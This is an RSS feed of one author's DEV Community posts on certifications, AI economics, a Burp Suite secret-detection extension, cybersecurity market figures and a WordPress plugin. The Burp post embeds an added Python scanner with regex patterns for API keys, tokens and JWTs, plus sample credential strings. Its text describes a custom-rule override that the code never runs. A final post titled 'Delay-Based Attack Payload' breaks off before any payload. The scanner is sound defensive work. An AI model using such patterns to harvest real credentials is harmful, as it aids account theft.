<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Hafiz Muhammad Attaullah</title>
    <description>The latest articles on DEV Community by Hafiz Muhammad Attaullah (@attaullahshafiq10).</description>
    <link>https://dev.to/attaullahshafiq10</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F548831%2Fc55dba93-e6cb-4eb9-8c57-6ddfa2e4a432.png</url>
      <title>DEV Community: Hafiz Muhammad Attaullah</title>
      <link>https://dev.to/attaullahshafiq10</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/attaullahshafiq10"/>
    <language>en</language>
    <item>
      <title>From Foundations to Cybersecurity Architect: My Microsoft Certification Journey</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 18 Apr 2025 20:59:48 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/from-foundations-to-cybersecurity-architect-my-microsoft-certification-journey-5339</link>
      <guid>https://dev.to/attaullahshafiq10/from-foundations-to-cybersecurity-architect-my-microsoft-certification-journey-5339</guid>
      <description>&lt;p&gt;it’s a moment of pride and reflection for me as I officially earned the Microsoft Certified: Cybersecurity Architect Expert (SC-100) certification — the highest level in Microsoft’s security track. But let me be clear: this wasn’t just a single exam. This was a journey — a story of growth, challenges, discipline, and an unshakable commitment to becoming better at what I do. This is my journey, from SC-900 all the way to SC-100 — and everything in between.&lt;/p&gt;

&lt;p&gt;It all started with curiosity. Cybersecurity was always more than a buzzword to me. It was about protecting value, designing resilience, and staying one step ahead of threats. I knew that to truly excel in this domain, I needed a solid framework to structure my learning. That’s when I decided to pursue Microsoft’s Security certification path — a roadmap designed to build skills layer by layer.&lt;/p&gt;

&lt;p&gt;I began with SC-900, Microsoft’s Security, Compliance, and Identity Fundamentals certification. It might seem basic to some, but for me, it laid the foundation. It helped me understand Microsoft’s security philosophy — from Zero Trust to compliance, governance, and risk. More importantly, it sparked the desire to go deeper.&lt;/p&gt;

&lt;p&gt;Then came SC-300, the Identity and Access Administrator certification. This is where things got technical. I immersed myself in managing Azure Active Directory, identity protection, multifactor authentication, B2B/B2C identities, conditional access, and secure hybrid identity strategies. It wasn’t easy. There were long nights, failed labs, and countless retries — but I pushed through. I didn’t just want to pass — I wanted to master it.&lt;/p&gt;

&lt;p&gt;And then, finally, SC-100 — the Cybersecurity Architect Expert. The title alone was intimidating. This exam expects you to think like a strategist, an architect, and a leader — all at once. It required me to bring together everything I had learned before, and add more. Designing security operations, managing regulatory compliance, leading risk assessments, securing hybrid and multi-cloud environments, implementing end-to-end Zero Trust — this was no joke.&lt;/p&gt;

&lt;p&gt;But I was ready. Because by now, it wasn’t just about certifications. It was about becoming the kind of professional who can lead organizations through secure digital transformation. It was about proving to myself that I could handle the pressure, own the responsibility, and live up to the title of 'Architect'.&lt;/p&gt;

&lt;p&gt;When I saw the 'Pass' result — I froze. Not because I doubted myself, but because the entire journey flashed before my eyes. Every lecture, every lab, every line of notes — it all came together in that one moment.&lt;/p&gt;

&lt;p&gt;What did I learn? That persistence pays off. That growth is never linear. That you don’t need to rush — you just need to move with purpose. And that if you dream of being at the top, you have to start at the bottom and climb intentionally.&lt;/p&gt;

&lt;p&gt;To anyone reading this — whether you’re just starting with SC-900 or aiming directly for SC-100 — know this: the journey is worth it. Every step teaches you something new. Stay consistent. Stay hungry. And never stop learning.&lt;/p&gt;

&lt;p&gt;Thanks to Allah SWT for the strength and clarity. Thanks to my mentors, peers, and the Microsoft community for the guidance and support. And now — time to apply everything in the real world and help organizations build security by design.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Teaching AI in 2025: Why We Must Include Its Financial Reality</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Tue, 15 Apr 2025 09:01:07 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/teaching-ai-in-2025-why-we-must-include-its-financial-reality-139b</link>
      <guid>https://dev.to/attaullahshafiq10/teaching-ai-in-2025-why-we-must-include-its-financial-reality-139b</guid>
      <description>&lt;p&gt;Just wrapped up a thought-provoking session with leaders from academia and the cloud industry — diving deep into AI, R&amp;amp;D, and the economics behind it all. One of the most important and sobering takeaways? Despite all the hype, most AI companies aren't actually making money — and the only real winners so far are those who power the infrastructure, not those building the models.&lt;/p&gt;

&lt;p&gt;We discussed how companies like OpenAI are currently on track to spend $9 billion in 2024 while making just $4 billion, with the bulk of their revenue going straight into compute costs. Even paying customers reportedly cost the company more than they bring in. Similarly, Anthropic, backed by giants like Amazon and Google, lost over $5.6 billion last year while generating under a billion in revenue. Stability AI, once a rising star, has faced funding challenges and leadership turbulence. And even newer entrants like Perplexity, despite high valuations, only brought in $56 million last year and remain unprofitable.&lt;/p&gt;

&lt;p&gt;In stark contrast, Nvidia, a hardware company rather than an AI startup, is thriving. In Q4 of FY24 alone, it reported $22.1 billion in revenue and $12.3 billion in profit, mostly driven by surging demand for its AI-optimized GPUs. Companies like OpenAI, Anthropic, and major cloud providers (AWS, Azure, Google Cloud) are essentially building their entire infrastructures on Nvidia’s chips — making it the backbone of this AI boom.&lt;/p&gt;

&lt;p&gt;What’s even more concerning is the broader industry picture. Microsoft and Google are pouring tens of billions into AI infrastructure — yet their generative AI products like Copilot and Gemini have relatively small user bases compared to their traditional offerings. Many of these tools are being pushed into enterprise suites more out of pressure to “look futuristic” than real customer demand. Meanwhile, a staggering portion of AI revenue is tied up in subscriptions and cloud credits, not sustainable business models.&lt;/p&gt;

&lt;p&gt;So what does all of this mean for us — as educators, researchers, and cloud service providers? It’s clear we need to start preparing students and professionals not just to build and use AI, but to deeply understand the economics behind it, the hardware-software balance, and what it truly means to create scalable, sustainable, and valuable technology. The hype is loud — but the numbers are louder.&lt;/p&gt;

&lt;p&gt;This conversation isn’t over. In fact, it’s just beginning.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Truffle Security: Enhancing Burp Suite with Automated Secret Detection</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Thu, 13 Mar 2025 18:04:39 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/truffle-security-enhancing-burp-suite-with-automated-secret-detection-19cd</link>
      <guid>https://dev.to/attaullahshafiq10/truffle-security-enhancing-burp-suite-with-automated-secret-detection-19cd</guid>
      <description>&lt;h2&gt;
  
  
  &lt;strong&gt;Introduction&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;As the cybersecurity landscape continues to evolve, security professionals and developers face an ongoing challenge: identifying and mitigating exposed secrets in web applications. Hardcoded credentials, API keys, and sensitive tokens are common vulnerabilities that, if leaked, can lead to severe security breaches.  &lt;/p&gt;

&lt;p&gt;To address this issue, &lt;strong&gt;Truffle Security&lt;/strong&gt;, a Burp Suite extension, provides an automated and efficient way to detect and manage secrets embedded in web applications. This tool helps security professionals streamline their assessments, ensuring that sensitive data is identified and mitigated before it can be exploited by attackers.  &lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;What is Truffle Security?&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Truffle Security is a &lt;strong&gt;Burp Suite extension&lt;/strong&gt; that integrates seamlessly into security testing workflows. It is designed to scan for exposed secrets within web traffic, helping users identify security risks quickly and efficiently. With its &lt;strong&gt;automation capabilities and customizable detection rules&lt;/strong&gt;, Truffle Security is a valuable tool for penetration testers, bug bounty hunters, and security researchers.  &lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Key Features&lt;/strong&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Automated Secret Detection&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Truffle Security runs its detectors over HTTP requests, responses, and other Burp Suite interactions, looking for &lt;strong&gt;exposed credentials, API keys, tokens, and other sensitive data&lt;/strong&gt;. This removes most of the manual inspection of responses and JavaScript bundles and makes the checks consistent across an engagement. Pattern-based findings still need triage: a match may be a revoked key, a test fixture, or a hash that merely looks like one, so confirm each hit before reporting it.  &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;2. Seamless Integration with Burp Suite&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;As a &lt;strong&gt;Burp Suite extension&lt;/strong&gt;, Truffle Security loads through Burp's Extensions tab (called Extender in older releases) and sees the same traffic as the rest of the suite. This lets users run its scanning directly within their &lt;strong&gt;Burp Suite security assessments&lt;/strong&gt;, without external tools or separate configuration.  &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;3. Customizable Detection Rules&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Security professionals can fine-tune Truffle Security by defining custom rules to detect &lt;strong&gt;specific types of secrets&lt;/strong&gt; based on their unique security needs. This ensures that the extension can be adapted to different application environments and threat models.  &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4. Open-Source and Community-Driven&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Truffle Security’s &lt;strong&gt;source code is available on GitHub&lt;/strong&gt;, allowing developers and researchers to review, modify, and contribute to its continuous improvement. This transparency ensures that the extension remains up to date with evolving security challenges.  &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;5. Efficient and Lightweight&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Unlike many security tools that introduce performance bottlenecks, Truffle Security is designed to be &lt;strong&gt;lightweight and efficient&lt;/strong&gt;. It &lt;strong&gt;does not significantly impact Burp Suite’s memory or CPU usage&lt;/strong&gt;, making it ideal for real-time security assessments.  &lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;How to Install and Use Truffle Security&lt;/strong&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Installation via the BApp Store&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Truffle Security can be installed &lt;strong&gt;directly from Burp Suite’s BApp Store&lt;/strong&gt; from the &lt;strong&gt;Extensions&lt;/strong&gt; tab (called Extender in older Burp releases). Here’s how:  &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Open &lt;strong&gt;Burp Suite&lt;/strong&gt;.
&lt;/li&gt;
&lt;li&gt;Navigate to &lt;strong&gt;Extensions &amp;gt; BApp Store&lt;/strong&gt; (&lt;strong&gt;Extender &amp;gt; BApp Store&lt;/strong&gt; in older releases).
&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Truffle Security&lt;/strong&gt;.
&lt;/li&gt;
&lt;li&gt;Click &lt;strong&gt;Install&lt;/strong&gt; and follow the on-screen instructions.
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Offline Installation&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;If you prefer &lt;strong&gt;offline installation&lt;/strong&gt;, you can download the extension from the &lt;a href="https://portswigger.net/bappstore" rel="noopener noreferrer"&gt;BApp Store&lt;/a&gt; website and load the file manually via &lt;strong&gt;Extensions &amp;gt; Installed &amp;gt; Add&lt;/strong&gt; in Burp Suite.  &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Using Truffle Security in Burp Suite&lt;/strong&gt;
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Enable the Extension&lt;/strong&gt; – Once installed, ensure Truffle Security is loaded under &lt;strong&gt;Extensions &amp;gt; Installed&lt;/strong&gt; (the Loaded checkbox; the tab is called Extender in older Burp releases).
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Configure Detection Rules&lt;/strong&gt; – Customize the extension’s &lt;strong&gt;secret detection rules&lt;/strong&gt; based on your specific security requirements.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Start Scanning&lt;/strong&gt; – Run security assessments, and Truffle Security will automatically scan for exposed credentials within &lt;strong&gt;HTTP requests, responses, and other web traffic&lt;/strong&gt;.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Review and Mitigate Findings&lt;/strong&gt; – The tool will highlight &lt;strong&gt;potential security risks&lt;/strong&gt;, allowing users to take necessary actions to mitigate them.
&lt;/li&gt;
&lt;/ol&gt;
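&lt;p&gt;To make the detection and rule-precedence behaviour concrete, here is an added Python example. It is not the extension's code and its patterns are not the extension's rule set: it walks a raw HTTP request and response the way a Burp-side scanner walks each message, runs a small rule set over every header line and the body, gates a generic rule on Shannon entropy so placeholder values are not reported, lets a user-supplied rule take precedence, and redacts what it reports. The rule patterns, rule names and the sample traffic are assumptions constructed for this example (the AWS key is AWS's public documentation example; everything else is made up to fit the patterns).&lt;/p&gt;

<![CDATA[
```python
"""Added example, not the extension's code: a standalone detector that does per
message what a Burp-side secret scanner does (walk headers and body, run rules,
let custom rules take precedence, report). Patterns and traffic are assumed."""
from __future__ import annotations

import math
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    min_entropy: float = 0.0      # 0 disables the entropy gate


@dataclass(frozen=True)
class Finding:
    rule: str
    location: str                 # "header:Name" or "body"
    secret: str                   # full value; report redacted() instead

    def redacted(self) -> str:
        s = self.secret
        return f"{s[:4]}...{s[-4:]}" if len(s) > 8 else "***"


def shannon_entropy(s: str) -> float:
    """Bits per character: 'aaaa' scores 0, 31 distinct characters about 4.95."""
    if not s:
        return 0.0
    n = len(s)
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Specific formats first, generic catch-all last. Group 1 (if any) is the secret.
# These patterns are assumptions for the example, not the extension's rule set.
DEFAULT_RULES: list[Rule] = [
    Rule("AWS access key ID", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    Rule("GitHub personal access token", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    Rule("JSON Web Token",
         re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b")),
    Rule("Generic high-entropy assignment",
         re.compile(r"(?i)\b(?:api[_-]?key|secret|password|token)\b[\"']?\s*[:=]\s*[\"']?"
                    r"([A-Za-z0-9+/=_-]{20,})"),
         min_entropy=3.5),        # drops placeholders such as "aaaaaaaaaaaaaaaaaaaaaaaa"
]


def with_custom_rule(rules: list[Rule], name: str, regex: str,
                     min_entropy: float = 0.0) -> list[Rule]:
    """Prepend a user-defined rule so it takes precedence over the generic one."""
    return [Rule(name, re.compile(regex), min_entropy)] + list(rules)


def scan_message(raw: str, rules: list[Rule] = DEFAULT_RULES) -> list[Finding]:
    """Scan one raw HTTP request or response: header lines individually (so the
    finding names the header), then the body as one chunk."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    targets = [("header:" + line.partition(":")[0].strip(), line)
               for line in head.split("\n")[1:]]          # [0] is the start line
    targets.append(("body", body))
    findings: list[Finding] = []
    seen: set[tuple[str, str]] = set()
    for location, chunk in targets:
        for rule in rules:
            for m in rule.pattern.finditer(chunk):
                secret = m.group(1) if m.lastindex else m.group(0)
                if rule.min_entropy and shannon_entropy(secret) < rule.min_entropy:
                    continue
                if (location, secret) in seen:            # first rule to match wins
                    continue
                seen.add((location, secret))
                findings.append(Finding(rule.name, location, secret))
    return findings


# Constructed sample traffic, not captured data. The AWS key is AWS's public
# documentation example; every other value is made up to fit the patterns.
SAMPLE_REQUEST = (
    "GET /api/me HTTP/1.1\r\nHost: app.example.com\r\n"
    "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\r\n"
    "Cookie: session=abc123\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n"
    "X-Internal-Token: INT-0123456789ABCDEF01234567\r\n\r\n"
    "window.CONFIG = {\n"
    '  awsAccessKeyId: "AKIAIOSFODNN7EXAMPLE",\n'
    '  github_token: "ghp_0123456789abcdefghijABCDEFGHIJ012345",\n'
    '  settings: {"apiKey": "K9mQ2xP7vL4nR8sT1wY6zB3cF5hJ0dG",'
    ' "token": "aaaaaaaaaaaaaaaaaaaaaaaa", "password": "changeme"}\n'
    "};\n"
)

if __name__ == "__main__":
    for f in scan_message(SAMPLE_REQUEST) + scan_message(SAMPLE_RESPONSE):
        print(f"{f.location:24} {f.rule:32} {f.redacted()}")
```
]]>

&lt;p&gt;Running it prints one line per finding with the secret redacted. The order of the rule list matters: specific formats are checked before the generic entropy rule, and the first rule to match a value at a location keeps the finding, which is how a rule added with &lt;code&gt;with_custom_rule&lt;/code&gt; (here a hypothetical internal token format, &lt;code&gt;INT-&lt;/code&gt; followed by 24 hex digits) overrides the generic report for the same header. The entropy gate is what separates &lt;code&gt;"token": "aaaaaaaaaaaaaaaaaaaaaaaa"&lt;/code&gt; (a placeholder, not reported) from a random-looking API key (reported). Whatever tool produces them, pattern findings still need triage.&lt;/p&gt;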

&lt;h2&gt;
  
  
  &lt;strong&gt;System Impact and Performance&lt;/strong&gt;
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Overall System Impact:&lt;/strong&gt; Minimal
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory Usage:&lt;/strong&gt; Low
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CPU Usage:&lt;/strong&gt; Low
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scanner Performance:&lt;/strong&gt; Does not introduce noticeable slowdowns
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Truffle Security is &lt;strong&gt;optimized for efficiency&lt;/strong&gt;, ensuring that security professionals can conduct assessments &lt;strong&gt;without compromising system performance&lt;/strong&gt;.  &lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Important Disclaimer&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Truffle Security is developed by &lt;strong&gt;third-party contributors&lt;/strong&gt;, and while it is a powerful tool, &lt;strong&gt;PortSwigger Web Security does not provide any warranties regarding its quality or effectiveness&lt;/strong&gt;. Users should evaluate and test the extension within their security environments before relying on it for critical assessments.  &lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Conclusion&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Truffle Security is a &lt;strong&gt;valuable addition to any security professional’s toolkit&lt;/strong&gt;, offering &lt;strong&gt;automated secret detection, Burp Suite integration, and customizable rules&lt;/strong&gt; to improve &lt;strong&gt;web application security&lt;/strong&gt;. Whether you are a penetration tester, security researcher, or DevSecOps professional, this extension provides &lt;strong&gt;a fast and efficient way to identify and mitigate exposed credentials before attackers can exploit them&lt;/strong&gt;.  &lt;/p&gt;

&lt;p&gt;For more information, visit the &lt;a href="https://portswigger.net/bappstore" rel="noopener noreferrer"&gt;BApp Store&lt;/a&gt; or explore the source code on &lt;strong&gt;&lt;a href="https://github.com" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Worldwide Cybersecurity market summary Q1 2024</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 28 Jun 2024 04:53:27 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/worldwide-cybersecurity-market-summary-q1-2024-ael</link>
      <guid>https://dev.to/attaullahshafiq10/worldwide-cybersecurity-market-summary-q1-2024-ael</guid>
      <description>&lt;p&gt;In today's rapidly evolving cybersecurity landscape, strategic partnerships and efficient distribution channels are more crucial than ever. With the majority of cybersecurity spending flowing through partners, understanding these dynamics can provide key insights into market trends and vendor strategies.&lt;/p&gt;

&lt;h2&gt;
  
  
  Overview of Cybersecurity Channel Spending
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;The majority (over 90%) of cybersecurity spending is routed through partners, indicating a strong reliance on the channel.&lt;/li&gt;
&lt;li&gt;Last quarter, the cybersecurity channel grew by 8.6%, amounting to US$18.5 billion.&lt;/li&gt;
&lt;li&gt;Channel-based spending on cybersecurity technology accounted for 91.6% of the total $20.3 billion market.&lt;/li&gt;
&lt;li&gt;According to Canalys data, 67.9% of the total cybersecurity market spending went through two-tier partners via distributors.&lt;/li&gt;
&lt;li&gt;One-tier partners represented 23.7% of the market, while direct sales accounted for the remaining 8.4%.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fit90bbn0b0gecipix2ch.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fit90bbn0b0gecipix2ch.jpeg" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Partner Updates from Leading Cybersecurity Vendors
&lt;/h2&gt;

&lt;h3&gt;
  
  
  CrowdStrike
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Entered into distributor agreements with SB&amp;amp;C in Japan and Ignition in the UK and the Nordics.&lt;/li&gt;
&lt;li&gt;Strengthened relationships with Global System Integrators (GSIs) such as HCLTech, TCS, Deloitte, EY, and Dell.&lt;/li&gt;
&lt;li&gt;These moves are expected to enhance CrowdStrike's market reach and integration capabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Palo Alto Networks
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Enabled partners in the EMEA and APAC regions to sell its software through private listings on the AWS Marketplace.&lt;/li&gt;
&lt;li&gt;Leveraged the DSOR program in collaboration with Westcon-Comstor to streamline the process.&lt;/li&gt;
&lt;li&gt;This approach is aimed at simplifying procurement and expanding the sales channels for Palo Alto Networks' products.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  SentinelOne
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Expanded its distributor agreement with Exclusive Networks, giving partners access to its Extended Detection and Response (XDR) offering.&lt;/li&gt;
&lt;li&gt;Signed a deal with Sherweb, allowing SentinelOne products to be added to Sherweb’s marketplace for Managed Service Providers (MSPs).&lt;/li&gt;
&lt;li&gt;These expansions are intended to enhance the distribution and accessibility of SentinelOne’s advanced cybersecurity solutions.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Sophos
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Broadened its distributor relationship with Infinigate Group to include the UK.&lt;/li&gt;
&lt;li&gt;This expansion is set to improve Sophos’ market penetration and support capabilities within the region.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  ESET
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Updated its Partner Connect Program to include an annual rebate aimed at incentivizing renewals.&lt;/li&gt;
&lt;li&gt;Introduced a comprehensive 90-day onboarding and training program for new partners.&lt;/li&gt;
&lt;li&gt;These updates are designed to enhance partner engagement and drive sustained growth.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Zscaler
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Announced a strategic shift to an ecosystem model to evolve its partner strategy.&lt;/li&gt;
&lt;li&gt;The new model aims to expand the types of partners Zscaler engages with, fostering technology alliances, simplifying procurement processes, and encouraging collaborative efforts on customer projects.&lt;/li&gt;
&lt;li&gt;This evolution is expected to broaden Zscaler’s market impact and facilitate integrated cybersecurity solutions.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The latest data and partner updates from leading cybersecurity vendors highlight the critical role of the channel in driving market growth. With the majority of cybersecurity spending going through partners, the strategic moves by vendors like CrowdStrike, Palo Alto Networks, SentinelOne, Sophos, ESET, and Zscaler demonstrate a strong commitment to enhancing their partner ecosystems and expanding their market reach. These efforts not only facilitate better distribution and sales but also foster innovation and collaboration within the cybersecurity industry.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>marketsummary</category>
      <category>attaullah</category>
    </item>
    <item>
      <title>Integrate DEV.to blogs to WordPress site</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 19 Apr 2024 08:26:04 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/integrate-devto-blogs-to-wordpress-site-78c</link>
      <guid>https://dev.to/attaullahshafiq10/integrate-devto-blogs-to-wordpress-site-78c</guid>
      <description>&lt;p&gt;Hello community!&lt;/p&gt;

&lt;p&gt;I've been diving into WordPress over the past few months, and to test my knowledge so far I developed a little widget plugin. It's designed to display your DEV posts right on your WordPress sidebar!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overview:&lt;/strong&gt;&lt;br&gt;
The Dev-to-WordPress plugin is a simple yet effective tool for integrating your articles from DEV.to into your WordPress website. Ideal for bloggers and developers eager to share their DEV.to content directly on their WordPress platforms, this plugin enhances content visibility and reader engagement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;br&gt;
Widget Integration: Effortlessly showcase your latest DEV.to articles using a customizable sidebar widget. This feature can be added to any widget area supported by your WordPress theme, ensuring a smooth integration with your existing site layout.&lt;br&gt;
Shortcode Capability: For those times when you need to spotlight a specific post within your WordPress content, the Dev-to-WordPress plugin provides a handy shortcode feature. This allows for the embedding of any DEV.to post directly into your pages or posts with ease.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Usage:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Widget:&lt;br&gt;
The Dev-to-WordPress sidebar widget serves as a gateway to your DEV.to blog posts. Once set up, it displays the latest articles linked to your DEV.to user profile. To implement this widget:&lt;/p&gt;

&lt;p&gt;Head to the Widgets section under the Appearance menu in your WordPress admin panel.&lt;br&gt;
Drag the Dev-to-WordPress widget to any widget area your theme supports.&lt;br&gt;
Enter your DEV.to username in the widget settings and save. Your latest posts will then automatically appear in the designated widget area.&lt;/p&gt;

&lt;p&gt;Shortcode:&lt;br&gt;
To embed a specific DEV.to post within your site's content, use the following shortcode method:&lt;/p&gt;

&lt;p&gt;Insert the shortcode below in the WordPress editor at your desired location:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;[devtowordpress post="https://dev.to/username/post-url-example"]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Substitute "&lt;a href="https://dev.to/username/post-url-example"&gt;https://dev.to/username/post-url-example&lt;/a&gt;" with the actual URL of the DEV.to post you wish to display.&lt;/p&gt;

&lt;p&gt;Technical Note:&lt;br&gt;
Rather than going through DEV.to's API, the plugin makes requests to a hardcoded DEV.to URL and renders the content it fetches, so your WordPress site can show the latest posts without any API configuration.&lt;/p&gt;

&lt;p&gt;Download and Installation:&lt;br&gt;
For the latest version of the Dev-to-WordPress plugin:&lt;/p&gt;

&lt;p&gt;Visit the official plugin page and look for the "Releases" section.&lt;br&gt;
Download the plugin as a .zip file from &lt;a href="https://github.com/attaullahshafiq10/dev-wordpress/releases/"&gt;&lt;strong&gt;this recent release&lt;/strong&gt;&lt;/a&gt;.&lt;br&gt;
Installation:&lt;br&gt;
Log into your WordPress admin panel.&lt;br&gt;
Navigate to Plugins &amp;gt; Add New and select the 'Upload Plugin' button.&lt;br&gt;
Upload the downloaded .zip file and select 'Install Now'.&lt;br&gt;
Once installed, activate the plugin through the 'Plugins' menu in WordPress.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl07mtt1srr0z366d01pu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl07mtt1srr0z366d01pu.png" alt="Image description" width="630" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Final Remarks:&lt;br&gt;
The Dev-to-WordPress plugin is an excellent resource for developers and content creators who actively use DEV.to and WordPress. It facilitates seamless integration of DEV.to content into WordPress sites, promoting consistency across your online platforms, enhancing user engagement, and simplifying content management. Whether you're a seasoned blogger or a budding developer, this plugin is a valuable addition to your WordPress toolkit.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>devtowordpress</category>
      <category>webdev</category>
      <category>attaullah</category>
    </item>
    <item>
      <title>Delay-Based Attack Payload</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 19 Apr 2024 07:42:35 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/delay-based-attack-payload-1ilo</link>
      <guid>https://dev.to/attaullahshafiq10/delay-based-attack-payload-1ilo</guid>
      <description>&lt;p&gt;Example:&lt;br&gt;
